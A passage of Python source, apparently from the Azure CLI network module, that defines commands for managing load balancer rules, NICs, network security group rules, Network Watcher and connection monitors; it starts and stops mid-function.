name=item_name,
protocol=protocol,
frontend_port=frontend_port,
backend_port=backend_port,
frontend_ip_configuration=get_property(lb.frontend_ip_configurations,
frontend_ip_name),
backend_address_pool=get_property(lb.backend_address_pools,
backend_address_pool_name),
probe=get_property(lb.probes, probe_name) if probe_name else None,
load_distribution=load_distribution,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset,
disable_outbound_snat=disable_outbound_snat)
if backend_pools_name:
new_rule.backend_address_pools = [get_property(lb.backend_address_pools, name) for name in backend_pools_name]
# Otherwiase service will response error : (LoadBalancingRuleBackendAdressPoolAndBackendAddressPoolsCannotBeSetAtTheSameTimeWithDifferentValue) BackendAddressPool and BackendAddressPools[] in LoadBalancingRule rule2 cannot be set at the same time with different value.
new_rule.backend_address_pool = None
upsert_to_collection(lb, 'load_balancing_rules', new_rule, 'name')
poller = cached_put(cmd, ncf.load_balancers.begin_create_or_update, lb, resource_group_name, load_balancer_name)
return get_property(poller.result().load_balancing_rules, item_name)
def set_lb_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, backend_address_pool_name=None, probe_name=None,
load_distribution='default', floating_ip=None, idle_timeout=None, enable_tcp_reset=None,
disable_outbound_snat=None, backend_pools_name=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('load_distribution', load_distribution)
c.set_param('disable_outbound_snat', disable_outbound_snat)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('enable_floating_ip', floating_ip)
if frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if backend_address_pool_name is not None:
instance.backend_address_pool = \
get_property(parent.backend_address_pools, backend_address_pool_name)
# To keep compatible when bump version from '2020-11-01' to '2021-02-01'
# https://github.com/Azure/azure-rest-api-specs/issues/14430
if cmd.supported_api_version(min_api='2021-02-01') and not backend_pools_name:
instance.backend_address_pools = [instance.backend_address_pool]
if backend_pools_name is not None:
instance.backend_address_pools = [get_property(parent.backend_address_pools, i) for i in backend_pools_name]
# Otherwiase service will response error : (LoadBalancingRuleBackendAdressPoolAndBackendAddressPoolsCannotBeSetAtTheSameTimeWithDifferentValue) BackendAddressPool and BackendAddressPools[] in LoadBalancingRule rule2 cannot be set at the same time with different value.
instance.backend_address_pool = None
if probe_name == '':
instance.probe = None
elif probe_name is not None:
instance.probe = get_property(parent.probes, probe_name)
return parent
def add_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, protocol, identifier, traffic_type, port=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
GatewayLoadBalancerTunnelInterface = cmd.get_models('GatewayLoadBalancerTunnelInterface')
tunnel_interface = GatewayLoadBalancerTunnelInterface(port=port, identifier=identifier, protocol=protocol, type=traffic_type)
if not address_pool.tunnel_interfaces:
address_pool.tunnel_interfaces = []
address_pool.tunnel_interfaces.append(tunnel_interface)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def update_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, index, protocol=None, identifier=None, traffic_type=None, port=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if index >= len(address_pool.tunnel_interfaces):
raise UnrecognizedArgumentError(f'{index} is out of scope, please input proper index')
item = address_pool.tunnel_interfaces[index]
if protocol:
item.protocol = protocol
if identifier:
item.identifier = identifier
if port:
item.port = port
if traffic_type:
item.type = traffic_type
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def remove_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, index):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if index >= len(address_pool.tunnel_interfaces):
raise UnrecognizedArgumentError(f'{index} is out of scope, please input proper index')
address_pool.tunnel_interfaces.pop(index)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def list_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
return address_pool.tunnel_interfaces
# endregion
# region LocalGateways
def _validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight):
if any([asn, bgp_peering_address, peer_weight]):
if instance.bgp_settings is not None:
# update existing parameters selectively
if asn is not None:
instance.bgp_settings.asn = asn
if peer_weight is not None:
instance.bgp_settings.peer_weight = peer_weight
if bgp_peering_address is not None:
instance.bgp_settings.bgp_peering_address = bgp_peering_address
elif asn:
BgpSettings = cmd.get_models('BgpSettings')
instance.bgp_settings = BgpSettings(asn, bgp_peering_address, peer_weight)
else:
raise CLIError(
'incorrect usage: --asn ASN [--peer-weight WEIGHT --bgp-peering-address IP]')
def create_local_gateway(cmd, resource_group_name, local_network_gateway_name, gateway_ip_address,
location=None, tags=None, local_address_prefix=None, asn=None,
bgp_peering_address=None, peer_weight=None, no_wait=False):
AddressSpace, LocalNetworkGateway, BgpSettings = cmd.get_models(
'AddressSpace', 'LocalNetworkGateway', 'BgpSettings')
client = network_client_factory(cmd.cli_ctx).local_network_gateways
local_gateway = LocalNetworkGateway(
local_network_address_space=AddressSpace(address_prefixes=(local_address_prefix or [])),
location=location, tags=tags, gateway_ip_address=gateway_ip_address)
if bgp_peering_address or asn or peer_weight:
local_gateway.bgp_settings = BgpSettings(asn=asn, bgp_peering_address=bgp_peering_address,
peer_weight=peer_weight)
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, local_network_gateway_name, local_gateway)
def update_local_gateway(cmd, instance, gateway_ip_address=None, local_address_prefix=None, asn=None,
bgp_peering_address=None, peer_weight=None, tags=None):
_validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight)
if gateway_ip_address is not None:
instance.gateway_ip_address = gateway_ip_address
if local_address_prefix is not None:
instance.local_network_address_space.address_prefixes = local_address_prefix
if tags is not None:
instance.tags = tags
return instance
# endregion
# region NetworkInterfaces (NIC)
def create_nic(cmd, resource_group_name, network_interface_name, subnet, location=None, tags=None,
internal_dns_name_label=None, dns_servers=None, enable_ip_forwarding=False,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
load_balancer_name=None, network_security_group=None,
private_ip_address=None, private_ip_address_version=None,
public_ip_address=None, virtual_network_name=None, enable_accelerated_networking=None,
application_security_groups=None, no_wait=False,
app_gateway_backend_address_pools=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
(NetworkInterface, NetworkInterfaceDnsSettings, NetworkInterfaceIPConfiguration, NetworkSecurityGroup,
PublicIPAddress, Subnet, SubResource) = cmd.get_models(
'NetworkInterface', 'NetworkInterfaceDnsSettings', 'NetworkInterfaceIPConfiguration',
'NetworkSecurityGroup', 'PublicIPAddress', 'Subnet', 'SubResource')
dns_settings = NetworkInterfaceDnsSettings(internal_dns_name_label=internal_dns_name_label,
dns_servers=dns_servers or [])
nic = NetworkInterface(location=location, tags=tags, enable_ip_forwarding=enable_ip_forwarding,
dns_settings=dns_settings)
if cmd.supported_api_version(min_api='2016-09-01'):
nic.enable_accelerated_networking = enable_accelerated_networking
if network_security_group:
nic.network_security_group = NetworkSecurityGroup(id=network_security_group)
ip_config_args = {
'name': 'ipconfig1',
'load_balancer_backend_address_pools': load_balancer_backend_address_pool_ids,
'load_balancer_inbound_nat_rules': load_balancer_inbound_nat_rule_ids,
'private_ip_allocation_method': 'Static' if private_ip_address else 'Dynamic',
'private_ip_address': private_ip_address,
'subnet': Subnet(id=subnet),
'application_gateway_backend_address_pools':
[SubResource(id=x) for x in app_gateway_backend_address_pools]
if app_gateway_backend_address_pools else None
}
if cmd.supported_api_version(min_api='2016-09-01'):
ip_config_args['private_ip_address_version'] = private_ip_address_version
if cmd.supported_api_version(min_api='2017-09-01'):
ip_config_args['application_security_groups'] = application_security_groups
ip_config = NetworkInterfaceIPConfiguration(**ip_config_args)
if public_ip_address:
ip_config.public_ip_address = PublicIPAddress(id=public_ip_address)
nic.ip_configurations = [ip_config]
if edge_zone:
nic.extended_location = _edge_zone_model(cmd, edge_zone)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, network_interface_name, nic)
def update_nic(cmd, instance, network_security_group=None, enable_ip_forwarding=None,
internal_dns_name_label=None, dns_servers=None, enable_accelerated_networking=None):
if enable_ip_forwarding is not None:
instance.enable_ip_forwarding = enable_ip_forwarding
if network_security_group == '':
instance.network_security_group = None
elif network_security_group is not None:
NetworkSecurityGroup = cmd.get_models('NetworkSecurityGroup')
instance.network_security_group = NetworkSecurityGroup(id=network_security_group)
if internal_dns_name_label == '':
instance.dns_settings.internal_dns_name_label = None
elif internal_dns_name_label is not None:
instance.dns_settings.internal_dns_name_label = internal_dns_name_label
if dns_servers == ['']:
instance.dns_settings.dns_servers = None
elif dns_servers:
instance.dns_settings.dns_servers = dns_servers
if enable_accelerated_networking is not None:
instance.enable_accelerated_networking = enable_accelerated_networking
return instance
def create_nic_ip_config(cmd, resource_group_name, network_interface_name, ip_config_name, subnet=None,
virtual_network_name=None, public_ip_address=None, load_balancer_name=None,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
private_ip_address=None,
private_ip_address_version=None,
make_primary=False,
application_security_groups=None,
app_gateway_backend_address_pools=None):
NetworkInterfaceIPConfiguration, PublicIPAddress, Subnet, SubResource = cmd.get_models(
'NetworkInterfaceIPConfiguration', 'PublicIPAddress', 'Subnet', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
nic = ncf.network_interfaces.get(resource_group_name, network_interface_name)
if cmd.supported_api_version(min_api='2016-09-01'):
IPVersion = cmd.get_models('IPVersion')
private_ip_address_version = private_ip_address_version or IPVersion.I_PV4.value
if private_ip_address_version == IPVersion.I_PV4.value and not subnet:
primary_config = next(x for x in nic.ip_configurations if x.primary)
subnet = primary_config.subnet.id
if make_primary:
for config in nic.ip_configurations:
config.primary = False
new_config_args = {
'name': ip_config_name,
'subnet': Subnet(id=subnet) if subnet else None,
'public_ip_address': PublicIPAddress(id=public_ip_address) if public_ip_address else None,
'load_balancer_backend_address_pools': load_balancer_backend_address_pool_ids,
'load_balancer_inbound_nat_rules': load_balancer_inbound_nat_rule_ids,
'private_ip_address': private_ip_address,
'private_ip_allocation_method': 'Static' if private_ip_address else 'Dynamic'
}
if cmd.supported_api_version(min_api='2016-09-01'):
new_config_args['private_ip_address_version'] = private_ip_address_version
new_config_args['primary'] = make_primary
if cmd.supported_api_version(min_api='2017-09-01'):
new_config_args['application_security_groups'] = application_security_groups
if cmd.supported_api_version(min_api='2018-08-01'):
new_config_args['application_gateway_backend_address_pools'] = \
[SubResource(id=x) for x in app_gateway_backend_address_pools] \
if app_gateway_backend_address_pools else None
new_config = NetworkInterfaceIPConfiguration(**new_config_args)
upsert_to_collection(nic, 'ip_configurations', new_config, 'name')
poller = ncf.network_interfaces.begin_create_or_update(
resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def update_nic_ip_config_setter(cmd, resource_group_name, network_interface_name, parameters, gateway_lb):
aux_subscriptions = []
if is_valid_resource_id(gateway_lb):
aux_subscriptions.append(parse_resource_id(gateway_lb)['subscription'])
client = network_client_factory(cmd.cli_ctx, aux_subscriptions=aux_subscriptions).network_interfaces
return client.begin_create_or_update(resource_group_name, network_interface_name, parameters)
def set_nic_ip_config(cmd, instance, parent, ip_config_name, subnet=None,
virtual_network_name=None, public_ip_address=None, load_balancer_name=None,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
private_ip_address=None,
private_ip_address_version=None, make_primary=False,
application_security_groups=None,
app_gateway_backend_address_pools=None, gateway_lb=None):
PublicIPAddress, Subnet, SubResource = cmd.get_models('PublicIPAddress', 'Subnet', 'SubResource')
if make_primary:
for config in parent.ip_configurations:
config.primary = False
instance.primary = True
if private_ip_address == '':
# switch private IP address allocation to Dynamic if empty string is used
instance.private_ip_address = None
instance.private_ip_allocation_method = 'dynamic'
if cmd.supported_api_version(min_api='2016-09-01'):
instance.private_ip_address_version = 'ipv4'
elif private_ip_address is not None:
# if specific address provided, allocation is static
instance.private_ip_address = private_ip_address
instance.private_ip_allocation_method = 'static'
if private_ip_address_version is not None:
instance.private_ip_address_version = private_ip_address_version
if subnet == '':
instance.subnet = None
elif subnet is not None:
instance.subnet = Subnet(id=subnet)
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if load_balancer_backend_address_pool_ids == '':
instance.load_balancer_backend_address_pools = None
elif load_balancer_backend_address_pool_ids is not None:
instance.load_balancer_backend_address_pools = load_balancer_backend_address_pool_ids
if load_balancer_inbound_nat_rule_ids == '':
instance.load_balancer_inbound_nat_rules = None
elif load_balancer_inbound_nat_rule_ids is not None:
instance.load_balancer_inbound_nat_rules = load_balancer_inbound_nat_rule_ids
if application_security_groups == ['']:
instance.application_security_groups = None
elif application_security_groups:
instance.application_security_groups = application_security_groups
if app_gateway_backend_address_pools == ['']:
instance.application_gateway_backend_address_pools = None
elif app_gateway_backend_address_pools:
instance.application_gateway_backend_address_pools = \
[SubResource(id=x) for x in app_gateway_backend_address_pools]
if gateway_lb is not None:
instance.gateway_load_balancer = None if gateway_lb == '' else SubResource(id=gateway_lb)
return parent
def _get_nic_ip_config(nic, name):
if nic.ip_configurations:
ip_config = next(
(x for x in nic.ip_configurations if x.name.lower() == name.lower()), None)
else:
ip_config = None
if not ip_config:
raise CLIError('IP configuration {} not found.'.format(name))
return ip_config
def add_nic_ip_config_address_pool(
cmd, resource_group_name, network_interface_name, ip_config_name, backend_address_pool,
load_balancer_name=None, application_gateway_name=None):
BackendAddressPool = cmd.get_models('BackendAddressPool')
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
if load_balancer_name:
upsert_to_collection(ip_config, 'load_balancer_backend_address_pools',
BackendAddressPool(id=backend_address_pool),
'id')
elif application_gateway_name:
upsert_to_collection(ip_config, 'application_gateway_backend_address_pools',
BackendAddressPool(id=backend_address_pool),
'id')
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def remove_nic_ip_config_address_pool(
cmd, resource_group_name, network_interface_name, ip_config_name, backend_address_pool,
load_balancer_name=None, application_gateway_name=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
if load_balancer_name:
keep_items = [x for x in ip_config.load_balancer_backend_address_pools or [] if x.id != backend_address_pool]
ip_config.load_balancer_backend_address_pools = keep_items
elif application_gateway_name:
keep_items = [x for x in ip_config.application_gateway_backend_address_pools or [] if
x.id != backend_address_pool]
ip_config.application_gateway_backend_address_pools = keep_items
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def add_nic_ip_config_inbound_nat_rule(
cmd, resource_group_name, network_interface_name, ip_config_name, inbound_nat_rule,
load_balancer_name=None):
InboundNatRule = cmd.get_models('InboundNatRule')
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
upsert_to_collection(ip_config, 'load_balancer_inbound_nat_rules',
InboundNatRule(id=inbound_nat_rule),
'id')
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def remove_nic_ip_config_inbound_nat_rule(
cmd, resource_group_name, network_interface_name, ip_config_name, inbound_nat_rule,
load_balancer_name=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
keep_items = \
[x for x in ip_config.load_balancer_inbound_nat_rules or [] if x.id != inbound_nat_rule]
ip_config.load_balancer_inbound_nat_rules = keep_items
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
# endregion
# region NetworkSecurityGroups
def create_nsg(cmd, resource_group_name, network_security_group_name, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).network_security_groups
NetworkSecurityGroup = cmd.get_models('NetworkSecurityGroup')
nsg = NetworkSecurityGroup(location=location, tags=tags)
return client.begin_create_or_update(resource_group_name, network_security_group_name, nsg)
def _create_singular_or_plural_property(kwargs, val, singular_name, plural_name):
if not val:
return
if not isinstance(val, list):
val = [val]
if len(val) > 1:
kwargs[plural_name] = val
kwargs[singular_name] = None
else:
kwargs[singular_name] = val[0]
kwargs[plural_name] = None
def _handle_asg_property(kwargs, key, asgs):
prefix = key.split('_', 1)[0] + '_'
if asgs:
kwargs[key] = asgs
if kwargs[prefix + 'address_prefix'].is_default:
kwargs[prefix + 'address_prefix'] = ''
def create_nsg_rule_2017_06_01(cmd, resource_group_name, network_security_group_name, security_rule_name,
priority, description=None, protocol=None, access=None, direction=None,
source_port_ranges='*', source_address_prefixes='*',
destination_port_ranges=80, destination_address_prefixes='*',
source_asgs=None, destination_asgs=None):
kwargs = {
'protocol': protocol,
'direction': direction,
'description': description,
'priority': priority,
'access': access,
'name': security_rule_name
}
_create_singular_or_plural_property(kwargs, source_address_prefixes,
'source_address_prefix', 'source_address_prefixes')
_create_singular_or_plural_property(kwargs, destination_address_prefixes,
'destination_address_prefix', 'destination_address_prefixes')
_create_singular_or_plural_property(kwargs, source_port_ranges,
'source_port_range', 'source_port_ranges')
_create_singular_or_plural_property(kwargs, destination_port_ranges,
'destination_port_range', 'destination_port_ranges')
# workaround for issue https://github.com/Azure/azure-rest-api-specs/issues/1591
kwargs['source_address_prefix'] = kwargs['source_address_prefix'] or ''
kwargs['destination_address_prefix'] = kwargs['destination_address_prefix'] or ''
if cmd.supported_api_version(min_api='2017-09-01'):
_handle_asg_property(kwargs, 'source_application_security_groups', source_asgs)
_handle_asg_property(kwargs, 'destination_application_security_groups', destination_asgs)
SecurityRule = cmd.get_models('SecurityRule')
settings = SecurityRule(**kwargs)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.security_rules.begin_create_or_update(
resource_group_name, network_security_group_name, security_rule_name, settings)
def create_nsg_rule_2017_03_01(cmd, resource_group_name, network_security_group_name, security_rule_name,
priority, description=None, protocol=None, access=None, direction=None,
source_port_range='*', source_address_prefix='*',
destination_port_range=80, destination_address_prefix='*'):
SecurityRule = cmd.get_models('SecurityRule')
settings = SecurityRule(protocol=protocol, source_address_prefix=source_address_prefix,
destination_address_prefix=destination_address_prefix, access=access,
direction=direction,
description=description, source_port_range=source_port_range,
destination_port_range=destination_port_range, priority=priority,
name=security_rule_name)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.security_rules.begin_create_or_update(
resource_group_name, network_security_group_name, security_rule_name, settings)
def _update_singular_or_plural_property(instance, val, singular_name, plural_name):
if val is None:
return
if not isinstance(val, list):
val = [val]
if len(val) > 1:
setattr(instance, plural_name, val)
setattr(instance, singular_name, None)
else:
setattr(instance, plural_name, None)
setattr(instance, singular_name, val[0])
def update_nsg_rule_2017_06_01(instance, protocol=None, source_address_prefixes=None,
destination_address_prefixes=None, access=None, direction=None, description=None,
source_port_ranges=None, destination_port_ranges=None, priority=None,
source_asgs=None, destination_asgs=None):
# No client validation as server side returns pretty good errors
instance.protocol = protocol if protocol is not None else instance.protocol
instance.access = access if access is not None else instance.access
instance.direction = direction if direction is not None else instance.direction
instance.description = description if description is not None else instance.description
instance.priority = priority if priority is not None else instance.priority
_update_singular_or_plural_property(instance, source_address_prefixes,
'source_address_prefix', 'source_address_prefixes')
_update_singular_or_plural_property(instance, destination_address_prefixes,
'destination_address_prefix', 'destination_address_prefixes')
_update_singular_or_plural_property(instance, source_port_ranges,
'source_port_range', 'source_port_ranges')
_update_singular_or_plural_property(instance, destination_port_ranges,
'destination_port_range', 'destination_port_ranges')
# workaround for issue https://github.com/Azure/azure-rest-api-specs/issues/1591
instance.source_address_prefix = instance.source_address_prefix or ''
instance.destination_address_prefix = instance.destination_address_prefix or ''
if source_asgs == ['']:
instance.source_application_security_groups = None
elif source_asgs:
instance.source_application_security_groups = source_asgs
if destination_asgs == ['']:
instance.destination_application_security_groups = None
elif destination_asgs:
instance.destination_application_security_groups = destination_asgs
return instance
def update_nsg_rule_2017_03_01(instance, protocol=None, source_address_prefix=None,
destination_address_prefix=None, access=None, direction=None, description=None,
source_port_range=None, destination_port_range=None, priority=None):
# No client validation as server side returns pretty good errors
instance.protocol = protocol if protocol is not None else instance.protocol
instance.source_address_prefix = (source_address_prefix if source_address_prefix is not None
else instance.source_address_prefix)
instance.destination_address_prefix = destination_address_prefix \
if destination_address_prefix is not None else instance.destination_address_prefix
instance.access = access if access is not None else instance.access
instance.direction = direction if direction is not None else instance.direction
instance.description = description if description is not None else instance.description
instance.source_port_range = source_port_range \
if source_port_range is not None else instance.source_port_range
instance.destination_port_range = destination_port_range \
if destination_port_range is not None else instance.destination_port_range
instance.priority = priority if priority is not None else instance.priority
return instance
# endregion
# region NetworkProfiles
def list_network_profiles(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).network_profiles
if resource_group_name:
return client.list(resource_group_name)
return client.list_all()
# endregion
# region NetworkWatchers
def _create_network_watchers(cmd, client, resource_group_name, locations, tags):
if resource_group_name is None:
raise CLIError("usage error: '--resource-group' required when enabling new regions")
NetworkWatcher = cmd.get_models('NetworkWatcher')
for location in locations:
client.create_or_update(
resource_group_name, '{}-watcher'.format(location),
NetworkWatcher(location=location, tags=tags))
def _update_network_watchers(cmd, client, watchers, tags):
NetworkWatcher = cmd.get_models('NetworkWatcher')
for watcher in watchers:
id_parts = parse_resource_id(watcher.id)
watcher_rg = id_parts['resource_group']
watcher_name = id_parts['name']
watcher_tags = watcher.tags if tags is None else tags
client.create_or_update(
watcher_rg, watcher_name,
NetworkWatcher(location=watcher.location, tags=watcher_tags))
def _delete_network_watchers(cmd, client, watchers):
for watcher in watchers:
from azure.cli.core.commands import LongRunningOperation
id_parts = parse_resource_id(watcher.id)
watcher_rg = id_parts['resource_group']
watcher_name = id_parts['name']
logger.warning(
"Disabling Network Watcher for region '%s' by deleting resource '%s'",
watcher.location, watcher.id)
LongRunningOperation(cmd.cli_ctx)(client.begin_delete(watcher_rg, watcher_name))
def configure_network_watcher(cmd, client, locations, resource_group_name=None, enabled=None, tags=None):
watcher_list = list(client.list_all())
locations_list = [location.lower() for location in locations]
existing_watchers = [w for w in watcher_list if w.location in locations_list]
nonenabled_regions = list(set(locations) - set(watcher.location for watcher in existing_watchers))
if enabled is None:
if resource_group_name is not None:
logger.warning(
"Resource group '%s' is only used when enabling new regions and will be ignored.",
resource_group_name)
for location in nonenabled_regions:
logger.warning(
"Region '%s' is not enabled for Network Watcher and will be ignored.", location)
_update_network_watchers(cmd, client, existing_watchers, tags)
elif enabled:
_create_network_watchers(cmd, client, resource_group_name, nonenabled_regions, tags)
_update_network_watchers(cmd, client, existing_watchers, tags)
else:
if tags is not None:
raise CLIError("usage error: '--tags' cannot be used when disabling regions")
_delete_network_watchers(cmd, client, existing_watchers)
return client.list_all()
def create_nw_connection_monitor(cmd,
client,
connection_monitor_name,
watcher_rg,
watcher_name,
resource_group_name=None,
location=None,
source_resource=None,
source_port=None,
dest_resource=None,
dest_port=None,
dest_address=None,
tags=None,
do_not_start=None,
monitoring_interval=None,
endpoint_source_name=None,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_source_type=None,
endpoint_source_coverage_level=None,
endpoint_dest_name=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
endpoint_dest_type=None,
endpoint_dest_coverage_level=None,
test_config_name=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_disable_trace_route=None,
test_config_tcp_port=None,
test_config_tcp_port_behavior=None,
test_config_icmp_disable_trace_route=None,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None,
test_group_name=None,
test_group_disable=None,
output_type=None,
workspace_ids=None,
notes=None):
v1_required_parameter_set = [
source_resource, source_port,
dest_resource, dest_address, dest_port
]
v2_required_parameter_set = [
endpoint_source_name, endpoint_source_resource_id, endpoint_source_type, endpoint_source_coverage_level,
endpoint_dest_name, endpoint_dest_address, endpoint_dest_type, endpoint_dest_coverage_level,
test_config_name, test_config_protocol,
output_type, workspace_ids,
]
if any(v1_required_parameter_set): # V1 creation
connection_monitor = _create_nw_connection_monitor_v1(cmd,
connection_monitor_name,
watcher_rg,
watcher_name,
source_resource,
resource_group_name,
source_port,
location,
dest_resource,
dest_port,
dest_address,
tags,
do_not_start,
monitoring_interval)
from azure.cli.core.profiles._shared import AD_HOC_API_VERSIONS
client = get_mgmt_service_client(
cmd.cli_ctx,
ResourceType.MGMT_NETWORK,
api_version=AD_HOC_API_VERSIONS[ResourceType.MGMT_NETWORK]['nw_connection_monitor']
).connection_monitors
elif any(v2_required_parameter_set): # V2 creation
connection_monitor = _create_nw_connection_monitor_v2(cmd,
location,
tags,
endpoint_source_name,
endpoint_source_resource_id,
endpoint_source_address,
endpoint_source_type,
endpoint_source_coverage_level,
endpoint_dest_name,
endpoint_dest_resource_id,
endpoint_dest_address,
endpoint_dest_type,
endpoint_dest_coverage_level,
test_config_name,
test_config_frequency,
test_config_protocol,
test_config_preferred_ip_version,
test_config_threshold_failed_percent,
test_config_threshold_round_trip_time,
test_config_tcp_port,
test_config_tcp_port_behavior,
test_config_tcp_disable_trace_route,
test_config_icmp_disable_trace_route,
test_config_http_port,
test_config_http_method,
test_config_http_path,
test_config_http_valid_status_codes,
test_config_http_prefer_https,
test_group_name,
test_group_disable,
output_type,
workspace_ids,
notes)
else:
raise CLIError('Unknown operation')
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def _create_nw_connection_monitor_v1(cmd,
connection_monitor_name,
watcher_rg,
watcher_name,
source_resource,
resource_group_name=None,
source_port=None,
location=None,
dest_resource=None,
dest_port=None,
dest_address=None,
tags=None,
do_not_start=None,
monitoring_interval=60):
ConnectionMonitor, ConnectionMonitorSource, ConnectionMonitorDestination = cmd.get_models(
'ConnectionMonitor', 'ConnectionMonitorSource', 'ConnectionMonitorDestination')
cmv1 = ConnectionMonitor(
location=location,
tags=tags,
source=ConnectionMonitorSource(
resource_id=source_resource,
port=source_port
),
destination=ConnectionMonitorDestination(
resource_id=dest_resource,
port=dest_port,
address=dest_address
),
auto_start=not do_not_start,
monitoring_interval_in_seconds=monitoring_interval,
endpoints=None,
test_configurations=None,
test_groups=None,
outputs=None,
notes=None
)
return cmv1
def _create_nw_connection_monitor_v2(cmd,
location=None,
tags=None,
endpoint_source_name=None,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_source_type=None,
endpoint_source_coverage_level=None,
endpoint_dest_name=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
endpoint_dest_type=None,
endpoint_dest_coverage_level=None,
test_config_name=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_port=None,
test_config_tcp_port_behavior=None,
test_config_tcp_disable_trace_route=False,
test_config_icmp_disable_trace_route=False,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None,
test_group_name=None,
test_group_disable=False,
output_type=None,
workspace_ids=None,
notes=None):
src_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_source_name,
endpoint_resource_id=endpoint_source_resource_id,
address=endpoint_source_address,
endpoint_type=endpoint_source_type,
coverage_level=endpoint_source_coverage_level)
dst_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_dest_name,
endpoint_resource_id=endpoint_dest_resource_id,
address=endpoint_dest_address,
endpoint_type=endpoint_dest_type,
coverage_level=endpoint_dest_coverage_level)
test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
test_config_name,
test_config_frequency,
test_config_protocol,
test_config_threshold_failed_percent,
test_config_threshold_round_trip_time,
test_config_preferred_ip_version,
test_config_tcp_port,
test_config_tcp_port_behavior,
test_config_tcp_disable_trace_route,
test_config_icmp_disable_trace_route,
test_config_http_port,
test_config_http_method,
test_config_http_path,
test_config_http_valid_status_codes,
test_config_http_prefer_https)
test_group = _create_nw_connection_monitor_v2_test_group(cmd,
test_group_name,
test_group_disable,
[test_config],
[src_endpoint],
[dst_endpoint])
if output_type:
outputs = []
if workspace_ids:
for workspace_id in workspace_ids:
output = _create_nw_connection_monitor_v2_output(cmd, output_type, workspace_id)
outputs.append(output)
else:
outputs = []
ConnectionMonitor = cmd.get_models('ConnectionMonitor')
cmv2 = ConnectionMonitor(location=location,
tags=tags,
auto_start=None,
monitoring_interval_in_seconds=None,
endpoints=[src_endpoint, dst_endpoint],
test_configurations=[test_config],
